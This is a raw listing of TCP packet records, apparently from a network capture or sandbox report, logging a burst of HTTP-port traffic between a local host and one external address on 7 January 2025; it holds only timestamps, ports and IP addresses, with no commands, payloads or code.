Jan 7, 2025 10:09:05.100812912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100824118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100836039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100867033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100883007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100893974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100905895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100919008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.100922108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100934029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.100977898 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101270914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101284027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101290941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101304054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101315975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101327896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101329088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101350069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101351976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101366997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101376057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101387978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101398945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101411104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101418972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101418972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101452112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101469040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101481915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101495028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101505041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101515055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101516962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101557970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101587057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101659060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101677895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101690054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101701021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101712942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101718903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101718903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101723909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101738930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101757050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101764917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101777077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101783037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101783037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101792097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101804018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101816893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.101826906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101826906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101866007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.101892948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.128901958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.128916979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.128928900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.128993034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129004955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129023075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129023075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.129034996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129048109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129066944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.129066944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.129107952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.129115105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129125118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129136086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129146099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129156113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129165888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129183054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.129183054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.129219055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.129352093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129363060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129374027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129384041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129395008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129404068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129415989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129420042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.129466057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.129532099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.151776075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.151787043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.151886940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.151896000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.151896954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.151912928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.151942015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.151947021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.151952982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.151962996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.151988983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.152014017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.152014017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184613943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184628963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184655905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184668064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184678078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184708118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184708118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184735060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184753895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184782028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184793949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184814930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184825897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184837103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184844971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184844971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184885979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184885979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184900045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184932947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184941053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184941053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184943914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.184984922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.184984922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185026884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185039043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185051918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185061932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185090065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185090065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185106993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185129881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185142040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185152054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185161114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185200930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185228109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185237885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185247898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185259104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185316086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185322046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185333014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185343027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185353041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185353041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185373068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185445070 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185471058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185487986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185497999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185508013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185517073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185527086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185535908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.185559988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185559988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.185592890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.186992884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187026024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187036991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187046051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187056065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187064886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187066078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187066078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187077045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187112093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187122107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187187910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187218904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187230110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187238932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187244892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187252045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187261105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187279940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187288046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187292099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187308073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187325001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187333107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187333107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187366009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187396049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187407017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187417030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187419891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187458992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187458992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187483072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187499046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187524080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187527895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187539101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187545061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187550068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187570095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187597990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187606096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187608957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187621117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187683105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187683105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187705994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187719107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187728882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187750101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187752962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187761068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187773943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187777042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187800884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187809944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187833071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187834978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187845945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187876940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187876940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187895060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187900066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187900066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187906027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187917948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187927961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.187932014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.187956095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.188059092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.188119888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.188132048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.188141108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.188152075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.188163042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.188177109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.188188076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.188198090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.188204050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.188204050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.188210011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.188235998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.188292980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.232044935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232083082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232101917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232111931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232122898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232132912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232144117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232152939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232163906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232172966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232183933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232193947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232203960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232224941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.232240915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232251883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232261896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232273102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232287884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232294083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232299089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.232335091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.232335091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.232383013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.239324093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.239339113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.239350080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.239407063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.239418983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.239440918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.239440918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.239464998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.239480972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.239490032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.239515066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.239537001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.271435976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271449089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271476984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271487951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271497965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271509886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271529913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.271558046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.271558046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.271615982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271627903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271749020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271759987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271783113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271811008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.271826982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.271857977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271868944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271882057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271893024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271934986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.271934986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.271958113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271970987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271984100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.271995068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272006035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272032022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272037983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272051096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272054911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272070885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272087097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272094965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272106886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272119045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272139072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272161007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272161007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272176981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272187948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272197962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272226095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272226095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272250891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272253990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272284031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272296906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272310019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272320986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272335052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272345066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272351027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272356033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.272391081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272391081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.272417068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.273772955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.273808956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.273822069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.273832083 CET	80	50017	31.41.244.11	192.168.2.4
